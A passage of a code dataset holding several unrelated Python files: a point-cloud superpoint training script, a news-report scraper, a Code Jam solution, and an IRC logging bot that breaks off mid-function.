zip(cases, expecteds):\n with self.subTest(case=case):\n actual = part2(*parse_input(case))\n self.assertEqual(expected, actual)\n\n############################### Main ###############################\nFUNC_TO_TEST = \"part2\"\n\nif __name__ == \"__main__\":\n # unittest.main()\n print(eval(f\"solve_{FUNC_TO_TEST}\")())\n","repo_name":"wxiang54/advent-of-code","sub_path":"2021/10/q10.py","file_name":"q10.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14671506318","text":"import os\nimport sys\nimport ast\nimport math\nimport time\nimport random\nimport logging\nimport argparse\n\nsys.path.append(os.path.join('/opt/conda/envs/ALVE-3D/lib/python3.10/site-packages/'))\n\nimport json\nimport h5py\nimport torch\nimport wandb\nimport numpy as np\nfrom tqdm import tqdm\nimport torchnet as tnt\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '../..'))\n\nfrom src.models.pointnet import PointNet\nfrom src.superpoints.graph import compute_sp_graph, create_s3dis_datasets, graph_collate\nfrom src.superpoints.provider import perfect_prediction, write_spg\n\nfrom src.superpoints.metrics import compute_boundary_precision, compute_boundary_recall, ConfusionMatrix\nfrom src.superpoints.losses import compute_weight_loss, compute_partition, relax_edge_binary, compute_loss, compute_dist\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Large-scale Point Cloud Semantic Segmentation with Superpoint Graphs')\n\n # Dataset\n parser.add_argument('--dataset', default='s3dis', help='Dataset name: sema3d|s3dis|vkitti')\n parser.add_argument('--cvfold', default=1, type=int,\n help='Fold left-out for testing in leave-one-out setting (S3DIS)')\n parser.add_argument('--resume', default='', help='Loads a previously saved model.')\n parser.add_argument('--db_train_name', default='trainval', help='Training set (Sema3D)')\n parser.add_argument('--db_test_name', default='testred', help='Test set (Sema3D)')\n parser.add_argument('--ROOT_PATH', default='data/S3DIS')\n parser.add_argument('--odir', default='models/pretrained', help='folder for saving the trained model')\n parser.add_argument('--spg_out', default=1, type=int,\n help='wether to compute the SPG for linking with the SPG semantic segmentation method')\n\n # Learning process arguments\n parser.add_argument('--cuda', default=1, type=int, help='Bool, use cuda')\n parser.add_argument('--nworkers', default=0, type=int,\n help='Num subprocesses to use for data loading. '\n '0 means that the data will be loaded in the main process')\n parser.add_argument('--test_nth_epoch', default=10, type=int, help='Test each n-th epoch during training')\n parser.add_argument('--save_nth_epoch', default=1, type=int, help='Save model each n-th epoch during training')\n parser.add_argument('--test_multisamp_n', default=10, type=int,\n help='Average logits obtained over runs with different seeds')\n # Optimization arguments\n parser.add_argument('--wd', default=0, type=float, help='Weight decay')\n parser.add_argument('--lr', default=1e-2, type=float, help='Initial learning rate')\n parser.add_argument('--lr_decay', default=0.7, type=float,\n help='Multiplicative factor used on learning rate at `lr_steps`')\n parser.add_argument('--lr_steps', default='[20,35,45]',\n help='List of epochs where the learning rate is decreased by `lr_decay`')\n parser.add_argument('--momentum', default=0.9, type=float, help='Momentum')\n parser.add_argument('--epochs', default=50, type=int,\n help='Number of epochs to train. If <=0, only testing will be done.')\n parser.add_argument('--batch_size', default=3, type=int, help='Batch size')\n parser.add_argument('--optim', default='adam', help='Optimizer: sgd|adam')\n parser.add_argument('--grad_clip', default=1, type=float,\n help='Element-wise clipping of gradient. If 0, does not clip')\n # Point cloud processing\n parser.add_argument('--pc_attribs', default='',\n help='Point attributes fed to PointNets, if empty then all possible.')\n parser.add_argument('--pc_augm_scale', default=2, type=float,\n help='Training augmentation: Uniformly random scaling in [1/scale, scale]')\n parser.add_argument('--pc_augm_rot', default=1, type=int,\n help='Training augmentation: Bool, random rotation around z-axis')\n parser.add_argument('--pc_augm_mirror_prob', default=0, type=float,\n help='Training augmentation: Probability of mirroring about x or y axes')\n parser.add_argument('--pc_augm_jitter', default=1, type=int,\n help='Training augmentation: Bool, Gaussian jittering of all attributes')\n # Point net\n parser.add_argument('--ptn_embedding', default='ptn',\n help='configuration of the learned cloud emebdder (ptn): uses PointNets '\n 'for vertices embeddings. no other options so far :)')\n parser.add_argument('--ptn_widths', default='[[32,128], [34,32,32,4]]', help='PointNet widths')\n parser.add_argument('--ptn_widths_stn', default='[[16,64],[32,16]]', help='PointNet\\'s Transformer widths')\n parser.add_argument('--use_color', default='rgb',\n help='How to use color in the local cloud embedding : rgb, lab or no')\n parser.add_argument('--ptn_nfeat_stn', default=2, type=int, help='PointNet\\'s Transformer number of input features')\n parser.add_argument('--ptn_prelast_do', default=0, type=float)\n parser.add_argument('--ptn_norm', default='batch',\n help='Type of norm layers in PointNets, \"batch or \"layer\" or \"group\"')\n parser.add_argument('--ptn_n_group', default=2, type=int,\n help='Number of groups in groupnorm. Only compatible with ptn_norm=group')\n parser.add_argument('--stn_as_global', default=1, type=int,\n help='Wether to use the STN output as a global variable')\n parser.add_argument('--global_feat', default='eXYrgb', help='Use rgb to embed points')\n parser.add_argument('--use_rgb', default=1, type=int,\n help='Wether to use radiometry value to use for cloud embeding')\n parser.add_argument('--ptn_mem_monger', default=0, type=int,\n help='Bool, save GPU memory by recomputing PointNets in back propagation.')\n\n # Loss\n parser.add_argument('--loss_weight', default='crosspartition',\n help='[none, proportional, sqrt, seal, crosspartition] which loss weighting scheme to choose '\n 'to train the model. unweighted: use classic cross_entropy loss, proportional: '\n 'weight inversely by transition count, SEAL: use SEAL loss as proposed in '\n 'https://jankautz.com/publications/LearningSuperpixels_CVPR2018.pdf, crosspartition : '\n 'our crosspartition weighting scheme')\n parser.add_argument('--loss', default='TVH_zhang',\n help='Structure of the loss : first term for intra edge (chose from : tv, laplacian, '\n 'TVH (pseudo-huber)), second one for interedge (chose from: zhang, scad, tv)')\n parser.add_argument('--transition_factor', default=5, type=float,\n help='Weight for transition edges in the graph structured contrastive loss')\n parser.add_argument('--dist_type', default='euclidian',\n help='[euclidian, intrisic, scalar] How to measure the distance between embeddings')\n\n # Graph-Clustering\n parser.add_argument('--ver_value', default='ptn',\n help='what value to use for vertices (ptn): uses PointNets, (geof) : '\n 'uses geometric features, (xyz) uses position, (rgb) uses color')\n parser.add_argument('--max_ver_train', default=1e3, type=int,\n help='Size of the subgraph taken in each point cloud for the training')\n parser.add_argument('--k_nn_adj', default=5, type=int, help='number of neighbors for the adjacency graph')\n parser.add_argument('--k_nn_local', default=20, type=int, help='number of neighbors to describe the local geometry')\n parser.add_argument('--reg_strength', default=0.1, type=float,\n help='Regularization strength or the generalized minimum partition problem.')\n parser.add_argument('--CP_cutoff', default=25, type=int,\n help='Minimum accepted component size in cut pursuit. '\n 'if negative, chose with respect tot his number '\n 'and the reg_strength as explained in the paper')\n parser.add_argument('--spatial_emb', default=0.2, type=float,\n help='Weight of xyz in the spatial embedding. When 0 : no xyz')\n parser.add_argument('--edge_weight_threshold', default=-0.5, type=float,\n help='Edge weight value when diff>1. '\n 'if negative, then switch to weight = exp(-diff * edge_weight_threshold)')\n\n # Metrics\n parser.add_argument('--BR_tolerance', default=1, type=int,\n help='How far an edge must be from an actual transition to be considered a true positive')\n\n args = parser.parse_args()\n\n args.start_epoch = 0\n args.lr_steps = ast.literal_eval(args.lr_steps)\n args.ptn_widths = ast.literal_eval(args.ptn_widths)\n args.ptn_widths_stn = ast.literal_eval(args.ptn_widths_stn)\n args.learned_embeddings = ('ptn' in args.ver_value) or args.ver_value == 'xyz'\n if args.CP_cutoff < 0: # adaptive cutoff: strong regularization will set a larger cutoff\n args.CP_cutoff = int(max(-args.CP_cutoff / 2, -args.CP_cutoff / 2 * np.log(args.reg_strength) - args.CP_cutoff))\n\n return args\n\n\nclass FolderHierarchy:\n SPG_FOLDER = \"superpoint_graphs\"\n EMBEDDINGS_FOLDER = \"embeddings\"\n SCALAR_FOLDER = \"scalars\"\n MODEL_FILE = \"model.pth.tar\"\n\n def __init__(self, output_dir, dataset_name, root_dir, cv_fold):\n self._root = root_dir\n if dataset_name == 's3dis':\n self._output_dir = os.path.join(output_dir, 'cv' + str(cv_fold))\n self._folders = [\"Area_1/\", \"Area_2/\", \"Area_3/\", \"Area_4/\", \"Area_5/\", \"Area_6/\"]\n elif dataset_name == 'sema3d':\n self._output_dir = os.path.join(output_dir, 'best')\n self._folders = [\"train/\", \"test_reduced/\", \"test_full/\"]\n elif dataset_name == 'vkitti':\n self._output_dir = os.path.join(output_dir, 'cv' + str(cv_fold))\n self._folders = [\"01/\", \"02/\", \"03/\", \"04/\", \"05/\", \"06/\"]\n\n os.makedirs(self._output_dir, exist_ok=True)\n\n self._spg_folder = self._create_folder(self.SPG_FOLDER)\n self._emb_folder = self._create_folder(self.EMBEDDINGS_FOLDER)\n self._scalars = self._create_folder(self.SCALAR_FOLDER)\n\n @property\n def output_dir(self):\n return self._output_dir\n\n @property\n def emb_folder(self):\n return self._emb_folder\n\n @property\n def spg_folder(self):\n return self._spg_folder\n\n @property\n def scalars(self):\n return self._scalars\n\n @property\n def model_path(self):\n return os.path.join(self._output_dir, self.MODEL_FILE)\n\n def _create_folder(self, property_name):\n folder = os.path.join(self._root, property_name)\n if not os.path.isdir(folder):\n os.makedirs(folder, exist_ok=True)\n return folder\n\n\ndef main(args: argparse.Namespace):\n stats = []\n random.seed(0)\n with wandb.init(project='Evaluate partitioning'):\n root = os.path.join(args.ROOT_PATH)\n folder_hierarchy = FolderHierarchy(args.odir, args.dataset, root, args.cvfold)\n\n dbinfo = get_s3dis_info()\n\n # Create the datasets\n print('Creating datasets...')\n train_ds, val_ds = create_s3dis_datasets(args)\n print(f'Train dataset size: {len(train_ds)}')\n print(f'Val dataset size: {len(val_ds)}')\n\n train_loader = DataLoader(train_ds, batch_size=args.batch_size, collate_fn=graph_collate,\n num_workers=args.nworkers,\n shuffle=True, drop_last=True)\n val_loader = DataLoader(val_ds, batch_size=1, collate_fn=graph_collate, num_workers=args.nworkers,\n shuffle=False, drop_last=False)\n\n model = PointNet(num_features=6, num_global_features=7, out_features=4)\n model.to(device)\n\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.wd)\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=args.lr_steps,\n gamma=args.lr_decay, last_epoch=args.start_epoch - 1)\n\n def train():\n model.train()\n\n loss_meter = tnt.meter.AverageValueMeter()\n n_clusters_meter = tnt.meter.AverageValueMeter()\n\n t0 = time.time()\n\n for bidx, (fname, edg_source, edg_target, is_transition, labels, objects, clouds_data, xyz) in enumerate(\n tqdm(train_loader)):\n\n # Move to device\n clouds, clouds_global, nei = clouds_data\n is_transition = is_transition.to(device)\n objects = objects.to(device)\n clouds = clouds.to(device)\n clouds_global = clouds_global.to(device)\n\n t_loader = 1000 * (time.time() - t0)\n optimizer.zero_grad()\n t0 = time.time()\n\n # Compute embeddings\n embeddings = model(clouds, clouds_global)\n print(f'embedding shape: {embeddings.shape}')\n\n # Compute loss\n diff = compute_dist(embeddings, edg_source, edg_target, args.dist_type)\n weights_loss, pred_comp, in_comp = compute_weight_loss(args, embeddings, objects, edg_source,\n edg_target,\n is_transition, diff, True, xyz)\n loss1, loss2 = compute_loss(args, diff, is_transition, weights_loss)\n\n wandb.log({\"First Loss - train\": loss1.item(), \"Second Loss - train\": loss2.item()})\n\n factor = 1000 # scaling for better usage of float precision\n\n loss = (loss1 + loss2) / weights_loss.shape[0] * factor\n\n loss.backward()\n\n if args.grad_clip > 0:\n for p in model.parameters():\n p.grad.data.clamp_(-args.grad_clip * factor, args.grad_clip * factor)\n\n optimizer.step()\n\n t_trainer = 1000 * (time.time() - t0)\n loss_meter.add(loss.item() / factor) # /weights_loss.mean().item())\n n_clusters_meter.add(embeddings.shape[0] / len(pred_comp))\n\n logging.debug('Batch loss %f, Loader time %f ms, Trainer time %f ms.', loss.item() / factor, t_loader,\n t_trainer)\n\n wandb.log({\"Batch loss - train\": loss.item() / factor, \"Loader time - train\": t_loader,\n \"Trainer time - train\": t_trainer})\n\n t0 = time.time()\n\n wandb.log({\"Epoch loss - train\": loss_meter.value()[0],\n \"Epoch n_clusters - train\": n_clusters_meter.value()[0]})\n\n return loss_meter.value()[0], n_clusters_meter.value()[0]\n\n def evaluate():\n \"\"\" Evaluated model on test set \"\"\"\n model.eval()\n\n with torch.no_grad():\n\n loss_meter = tnt.meter.AverageValueMeter()\n n_clusters_meter = tnt.meter.AverageValueMeter()\n BR_meter = tnt.meter.AverageValueMeter()\n BP_meter = tnt.meter.AverageValueMeter()\n CM_classes = ConfusionMatrix(dbinfo['classes'])\n\n # iterate over dataset in batches\n for bidx, (\n fname, edg_source, edg_target, is_transition, labels, objects, clouds_data, xyz) in enumerate(\n tqdm(val_loader)):\n\n # Move to device\n clouds, clouds_global, nei = clouds_data\n is_transition = is_transition.to(device)\n objects = objects.to(device)\n clouds = clouds.to(device)\n clouds_global = clouds_global.to(device)\n\n embeddings = model(clouds, clouds_global)\n\n diff = compute_dist(embeddings, edg_source, edg_target, args.dist_type)\n\n if len(is_transition) > 1:\n weights_loss, pred_components, pred_in_component = compute_weight_loss(args, embeddings,\n objects,\n edg_source, edg_target,\n is_transition, diff,\n True,\n xyz)\n loss1, loss2 = compute_loss(args, diff, is_transition, weights_loss)\n loss = (loss1 + loss2) / weights_loss.shape[0]\n pred_transition = pred_in_component[edg_source] != pred_in_component[edg_target]\n per_pred = perfect_prediction(pred_components, labels)\n CM_classes.count_predicted_batch(labels[:, 1:], per_pred)\n else:\n loss = 0\n\n if len(is_transition) > 1:\n loss_meter.add(loss.item()) # /weights_loss.sum().item())\n is_transition = is_transition.cpu().numpy()\n n_clusters_meter.add(len(pred_components))\n BR_meter.add((is_transition.sum()) * compute_boundary_recall(is_transition,\n relax_edge_binary(pred_transition,\n edg_source,\n edg_target,\n xyz.shape[0],\n args.BR_tolerance)),\n n=is_transition.sum())\n BP_meter.add((pred_transition.sum()) * compute_boundary_precision(\n relax_edge_binary(is_transition, edg_source, edg_target, xyz.shape[0], args.BR_tolerance),\n pred_transition), n=pred_transition.sum())\n CM = CM_classes.confusion_matrix\n return loss_meter.value()[0], n_clusters_meter.value()[0], 100 * CM.trace() / CM.sum(), BR_meter.value()[0], \\\n BP_meter.value()[0]\n\n def evaluate_final():\n \"\"\" Evaluated model on test set \"\"\"\n\n print(\"Final evaluation\")\n model.eval()\n\n loss_meter = tnt.meter.AverageValueMeter()\n n_clusters_meter = tnt.meter.AverageValueMeter()\n confusion_matrix_classes = ConfusionMatrix(dbinfo['classes'])\n confusion_matrix_BR = ConfusionMatrix(2)\n confusion_matrix_BP = ConfusionMatrix(2)\n\n with torch.no_grad():\n\n # iterate over dataset in batches\n for bidx, (\n fname, edg_source, edg_target, is_transition, labels, objects, clouds_data, xyz) in enumerate(\n tqdm(val_loader)):\n\n # Move to device\n clouds, clouds_global, nei = clouds_data\n is_transition = is_transition.to(device, non_blocking=True)\n objects = objects.to(device, non_blocking=True)\n clouds = clouds.to(device, non_blocking=True)\n clouds_global = clouds_global.to(device, non_blocking=True)\n\n embeddings = model(clouds, clouds_global)\n\n diff = compute_dist(embeddings, edg_source, edg_target, args.dist_type)\n\n pred_components, pred_in_component = compute_partition(args, embeddings, edg_source, edg_target,\n diff,\n xyz)\n\n if len(is_transition) > 1:\n pred_transition = pred_in_component[edg_source] != pred_in_component[edg_target]\n is_transition = is_transition.cpu().numpy()\n\n n_clusters_meter.add(len(pred_components))\n\n per_pred = perfect_prediction(pred_components, labels)\n confusion_matrix_classes.count_predicted_batch(labels[:, 1:], per_pred)\n confusion_matrix_BR.count_predicted_batch_hard(is_transition,\n relax_edge_binary(pred_transition, edg_source,\n edg_target, xyz.shape[0],\n args.BR_tolerance).astype(\n 'uint8'))\n confusion_matrix_BP.count_predicted_batch_hard(\n relax_edge_binary(is_transition, edg_source, edg_target, xyz.shape[0], args.BR_tolerance),\n pred_transition.astype('uint8'))\n\n if args.spg_out:\n graph_sp = compute_sp_graph(xyz, 100, pred_in_component, pred_components, labels,\n dbinfo[\"classes\"])\n spg_file = os.path.join(folder_hierarchy.spg_folder, fname[0])\n if not os.path.exists(os.path.dirname(spg_file)):\n os.makedirs(os.path.dirname(spg_file))\n try:\n os.remove(spg_file)\n except OSError:\n pass\n write_spg(spg_file, graph_sp, pred_components, pred_in_component)\n\n # Debugging purpose - write the embedding file and an exemple of scalar files\n # if bidx % 0 == 0:\n # embedding2ply(os.path.join(folder_hierarchy.emb_folder , fname[0][:-3] + '_emb.ply'), xyz, embeddings.detach().cpu().numpy())\n # scalar2ply(os.path.join(folder_hierarchy.scalars , fname[0][:-3] + '_elevation.ply') , xyz, clouds_data[1][:,1].cpu())\n # edg_class = is_transition + 2*pred_transition\n # edge_class2ply2(os.path.join(folder_hierarchy.emb_folder , fname[0][:-3] + '_transition.ply'), edg_class, xyz, edg_source, edg_target)\n\n if len(is_transition) > 1:\n res_name = folder_hierarchy.output_dir + '/res.h5'\n res_file = h5py.File(res_name, 'w')\n res_file.create_dataset('confusion_matrix_classes'\n , data=confusion_matrix_classes.confusion_matrix, dtype='uint64')\n res_file.create_dataset('confusion_matrix_BR'\n , data=confusion_matrix_BR.confusion_matrix, dtype='uint64')\n res_file.create_dataset('confusion_matrix_BP'\n , data=confusion_matrix_BP.confusion_matrix, dtype='uint64')\n res_file.create_dataset('n_clusters'\n , data=n_clusters_meter.value()[0], dtype='uint64')\n res_file.close()\n\n return\n\n for epoch in range(args.start_epoch, args.epochs):\n if not args.learned_embeddings:\n break\n print('Epoch {}/{} ({}):'.format(epoch, args.epochs, folder_hierarchy.output_dir))\n\n loss, n_sp = train()\n scheduler.step()\n\n if (epoch + 1) % args.test_nth_epoch == 0: # or epoch+1==args.epochs:\n loss_test, n_clusters_test, ASA_test, BR_test, BP_test = evaluate()\n print(\n '-> Train loss: %1.5f - Test Loss: %1.5f | n_clusters: %5.1f | ASA: %3.2f %% | Test BR: %3.2f %% | BP : %3.2f%%' % (\n loss, loss_test, n_clusters_test, ASA_test, BR_test, BP_test))\n else:\n loss_test, n_clusters_test, ASA_test, BR_test, BP_test = 0, 0, 0, 0, 0\n print('-> Train loss: %1.5f superpoints size : %5.0f' % (loss, n_sp))\n\n stats.append({'epoch': epoch, 'loss': loss, 'loss_test': loss_test, 'n_clusters_test': n_clusters_test,\n 'ASA_test': ASA_test, 'BR_test': BR_test, 'BP_test': BP_test})\n\n with open(os.path.join(folder_hierarchy.output_dir, 'trainlog.json'), 'w') as outfile:\n json.dump(stats, outfile, indent=4)\n\n if epoch % args.save_nth_epoch == 0 or epoch == args.epochs - 1:\n model_name = 'model.pth.tar'\n print(\"Saving model to \" + model_name)\n model_name = 'model.pth.tar'\n torch.save({'epoch': epoch + 1, 'args': args, 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict()},\n os.path.join(folder_hierarchy.output_dir, model_name))\n\n if math.isnan(loss): break\n\n evaluate_final()\n\n # ==========================================================================================\n #\n # model = PointNet(num_features=6, num_global_features=7, out_features=4)\n # model.to(device)\n #\n # checkpoint = torch.load(os.path.join(folder_hierarchy.output_dir, 'model.pth.tar'), map_location=device)\n # model.load_state_dict(checkpoint['state_dict'])\n #\n # model.eval()\n #\n # for bidx, (fname, edg_source, edg_target, is_transition, labels, objects, clouds_data, xyz) in enumerate(\n # tqdm(train_loader)):\n # clouds, clouds_global, nei = clouds_data\n # is_transition = is_transition.to(device, non_blocking=True)\n # objects = objects.to(device, non_blocking=True)\n # clouds = clouds.to(device, non_blocking=True)\n # clouds_global = clouds_global.to(device, non_blocking=True)\n #\n # embeddings = model(clouds, clouds_global)\n #\n # diff = compute_dist(embeddings, edg_source, edg_target, args.dist_type)\n #\n # pred_components, pred_in_component = compute_partition(args, embeddings, edg_source, edg_target, diff, xyz)\n #\n # # Map colors to components\n # print(max(pred_in_component))\n # color_map = instances_color_map()\n # pred_components_color = color_map[pred_in_component]\n #\n # cloud = np.concatenate([xyz, pred_components_color * 255], axis=1)\n #\n # # Log statistics\n # wandb.log({'Point Cloud': wandb.Object3D(cloud)})\n #\n # print(f'\\nLogged scan: {fname[0]}')\n #\n # # graph_sp = compute_sp_graph(xyz, 100, pred_in_component, pred_components, labels, 13)\n # #\n # # spg_file = os.path.join(folder_hierarchy.spg_folder, fname[0])\n # #\n # # write_spg(spg_file, graph_sp, pred_components, pred_in_component)\n\n\ndef instances_color_map():\n # make instance colors\n max_inst_id = 100000\n color_map = np.random.uniform(low=0.0, high=1.0, size=(max_inst_id, 3))\n # force zero to a gray-ish color\n color_map[0] = np.full(3, 0.1)\n return color_map\n\n\ndef get_s3dis_info():\n # for now, no edge attributes\n return {\n 'classes': 13,\n 'inv_class_map': {0: 'ceiling', 1: 'floor', 2: 'wall', 3: 'column', 4: 'beam', 5: 'window', 6: 'door',\n 7: 'table', 8: 'chair', 9: 'bookcase', 10: 'sofa', 11: 'board', 12: 'clutter'},\n }\n\n\nif __name__ == \"__main__\":\n arguments = parse_args()\n main(arguments)\n","repo_name":"aleskucera/MuVAL","sub_path":"src/superpoints/supervised_partition.py","file_name":"supervised_partition.py","file_ext":"py","file_size_in_byte":28726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44532693418","text":"import requests\nimport re\n\nimport xlsxwriter\nimport pickle, sys\n\nURL = \"http://www.weimar-in.de/01news/01news.php?site={0}&searchstring=&newscat=#01jumpnews\"\n\nREGEX_HEADING = r\"

([\\s\\S]*?)<\\/h2>\"\nREGEX_REPORTS = r\"([\\s\\S]*?)\"\n\n\ndef striphtml(data):\n p = re.compile(r'<.*?>')\n return p.sub('', data)\n\ndef replaceUmlauts(data):\n data = data.replace(\"ä\", \"ä\")\n data = data.replace(\"ö\", \"ö\")\n data = data.replace(\"ü\", \"ü\")\n data = data.replace(\"ß\", \"ß\")\n data = data.replace(\"Ä\", \"Ä\")\n data = data.replace(\"Ö\", \"Ö\")\n data = data.replace(\"Ü\", \"U\")\n\n data = data.replace(\"\\r\", \"\")\n data = data.replace(\"\\n\", \"\")\n\n return data\n\npicklelist = []\n\n\nfor i in range(1, 662):\n r = requests.get(URL.format(i))\n \n heading = re.findall(REGEX_HEADING, r.text)\n reports = re.findall(REGEX_REPORTS, r.text)\n\n try:\n heading = ''.join(e for e in heading[0] if e.isalnum())\n except:\n heading = \"EMPTY\"\n\n for report in reports:\n content = replaceUmlauts(striphtml(report))\n\n pickledict = { \"heading\": heading,\n \"date\": None,\n \"text\": content,\n \"streets\": [],\n \"locations\": [], \n \"confidence\": 0.5\n }\n\n picklelist.append(pickledict)\n\nfd = open(\"raw.pickle\", \"wb\")\npickle.dump(picklelist, fd)\n\n","repo_name":"volzotan/weimar-crime-map","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23594908941","text":"#!/usr/bin/python\n\nimport sys\n\ndef getl():\n\treturn sys.stdin.readline().rstrip()\n\ntext = 'welcome to code jam'\n\ndef find_indexes(s, ch, p=-1, l=None):\n\tif l is None:\n\t\tl = []\n\tpos = s.find(ch, p+1)\n\tif pos == -1:\n\t\treturn l\n\telse:\n\t\tl.append(pos)\n\t\treturn find_indexes(s, ch, pos, l)\n\ndef count(text, m, p=0, n=-1):\n\tl = filter(lambda x: x>n, m[text[p]])\n\tif p == len(text)-1:\n\t\treturn len(l)\n\telse:\n\t\treturn sum(count(text, m, p+1, x) for x in l)\n\nn = int(getl())\n\nfor i in range(n):\n\tline = getl()\n\tline = filter(lambda c: c if c in 'welcomtdja ' else '', line)\n\tm = {}\n\tfor j in 'welcomtdja ':\n\t\tm[j] = find_indexes(line, j)\n\t#m['j'] = filter(lambda x: x>max(m[' ']), m['j'])\n\t#m['a'] = filter(lambda x: x>max(m['j']), m['a'])\n\tprint('Case #{0}: {1}'.format(i+1, str(count(text,m))[-4:].zfill(4)))\t\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_36/328.py","file_name":"328.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71206497473","text":"from time import strftime\nfrom bs4 import BeautifulSoup\nimport requests\nimport socket\nimport os\n\n''' Assign Program Wide Variables\n'''\nSERVER = 'irc.rizon.net'\nPORT = 6667\nCHANNEL = '#linux'\n\nNICK = 'TheLost'\nUSER = NICK # Change this if you want a different username for your bot than its Nick.\nREALNAME = 'Lost In Potatolation'\nMODE = 0\t# Generally you don't want to change this\n\nMASTER = 'Kalq'\n\nLOG_DIR = 'logs'\n\n''' Establishing Socket Connection\n'''\nircsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nircsock.connect((SERVER, PORT))\n\nhandle = ircsock.makefile(mode='rw', buffering=1, encoding='UTF-8', newline='\\r\\n') # makefile function allows us to treat the irc socket as a file from which we can read and write to.\n\ndef log(command, sender, dest = None, params = None, source = None):\n\t''' Designed to log any conversation in all channels the bot is connected to as well as private messages to the bot itself.\n\t'''\n\n\tpath = os.path.join(LOG_DIR, dest) # Defines the path where the logs will be saved. dest is defined by the channel the message is posted on, or the bot itself\n\n\t# Creates the log directory if it doesn't already exist\n\tif not os.path.exists(path):\n\t\tos.makedirs(path)\n\n\t# Defines the date and time\n\tdate = strftime('%Y-%m-%d')\n\ttime = strftime('%H:%M:%S')\n\n\t# Defines the variable to which we can append the logs\n\tlog = open(os.path.join(path, date + '.log'), 'a')\n\n\tif command == '/me': # Checks to see if the sender is using the '/me' in his irc client. Determined by the handle_ctcp function.\n\t\tprint('[' + time + ']', sender, params, file=log)\n\telif command == 'PRIVMSG':\n\t\tprint('[' + time + ']', sender, '>>>', params, file=log)\n\telif command == 'JOIN':\n\t\tprint('[' + time + '] *', sender, '(', source, ') has joined', dest, file=log)\n\telif command == 'PART':\n\t\tif params is None:\n\t\t\tprint('[' + time + '] *', sender, '(', source, ') has left', dest, file=log)\n\t\telse:\n\t\t\tprint('[' + time + '] *', sender, '(', source, ') has left', dest, '(', params, ')', file=log)\n\n\tlog.close()\n\ndef handle_commands(dest, command):\n\tif command[1:].startswith('def '):\n\t\tsearch = command.split(' ', 1)[1]\n\t\thtml = requests.get('https://www.wordnik.com/words/' + search)\n\t\tsoup = BeautifulSoup(html.text)\n\t\t\n\t\ttry:\n\t\t\tdefinition = soup.abbr.parent.get_text()\n\t\t\tprint('PRIVMSG', dest, ':' + definition, file=handle)\n\t\t\tlog('PRIVMSG', NICK, dest = dest, params = definition)\n\t\texcept:\n\t\t\tprint('PRIVMSG', dest, ':Word Not Found', file=handle)\t\n\n''' The IRC protocol provides for 3 initial commands when connecting to a new server. The PASS command is optional depending on if the irc server is private. The NICK and USER commands are required.\n'''\ndef set_nick(nick):\n\tprint('NICK', nick, file=handle) # Sends the NICK command to the server with the appropriate parameters.\n\ndef connect(nick, user, mode, realname, password = None):\n\tif password:\n\t\tprint(PASS, password, file=handle) # Checks if the password parameter is giver to connect to the server and sends it.\n\t\n\tset_nick(nick)\n\tprint('USER', user, mode, '* :'+realname, file=handle) # Sends the USER command to the server with the appropriate parameters.\n\ndef join(channel, key = None):\n\tif key is None:\n\t\tprint('JOIN', channel, file=handle)\n\telse:\n\t\tprint('JOIN', channel, key, file=handle) # The JOIN command has an optional parameter depending on whether the channel being connected to requires it.\n\ndef quit(reason = \"Quit\"):\n\t''' The QUIT command exits the server. Therefore we close the socket connected to the server\n\t'''\n\n\tprint('QUIT', reason, file=handle)\n\tircsock.close()\n\ndef private_message(to, msg):\n\t''' The PRIVMSG command sends a message to a user or channel that the bot is connected to\n\t'''\n\n\tprint('PRIVMSG', to, ':'+ msg, file=handle)\n\ndef notice(to, msg):\n\t''' The NOTICE command sends a message to a user or channel\n\t'''\n\n\tprint('NOTICE', to, ':'+ msg, file=handle)\n\ndef handle_ctcp(sender, dest, message):\n\t''' This function handles the various CTCP commands used in IRC.\n\t'''\n\n\tmessage = message[1:].strip('\\x01').split(' ', 1) # Strips the message of the hexadecimal CTCP codes and splits them into the command and any potential parameters.\n\n\tif message[0] == 'ACTION': # The '/me' command\n\t\tlog('/me', sender, dest = dest, params = message[1])\n\nconnect(NICK, USER, MODE, REALNAME)\njoin(CHANNEL)\n\nfor line in handle:\n\tline = line.strip() # Strips the line of any excess whitespace or newlines or tabs or what have you.\n\tprint(line)\n\n\tprefix = None\n\tif line[0] == ':': # Almost every command from an irc server will start with a ':'. Notable exception are PINGs.\n\t\t(prefix, line) = line[1:].split(' ', 1) # The 'prefix' contains the source of the command. The 'line' is the command and any parameters involved. ie: 'PRIVMSG #channel :Hello World\n\t(command, params) = line.split(' ', 1)\t# Simply splits the command from it's paraments. i.e: PRIVMSG, JOIN etc.\n\n\n\tif command == 'PING':\n\t\tprint('PONG', params, file=handle) # Respond to the irc server with an equivalent PONG of the PING they sent.\n\telif command == 'PRIVMSG':\t\t\n\t\tsender = prefix.split('!', 1)[0] # Determines the Nick of the sender via the source in the 'prefix' variable\n\t\t(dest, message) = params.split(' ', 1) # All PRIVMSG commands contain an intial destination (#channel, Nick) and then the message itself\n\t\tif message[0:2] == ':\\x01': # Checks to see if the message starts with a hexidecimal ctcp code. Let's the handle_ctcp function deal with its uniqueness.\n\t\t\thandle_ctcp(sender, dest, message)\n\t\telse:\n\t\t\tlog(command, sender, dest = dest, params = message[1:])\n\t\t\tif message[1] == '.':\n\t\t\t\thandle_commands(dest, message[1:])\n\t\n\telif command == 'JOIN':\n\t\t(sender, source) = prefix.split('!', 1)\n\t\tlog(command, sender, dest = params[1:], source = source)\n\t\n\telif command == 'PART':\n\t\t(sender, source) = prefix.split('!', 1)\n\n\t\tif ' 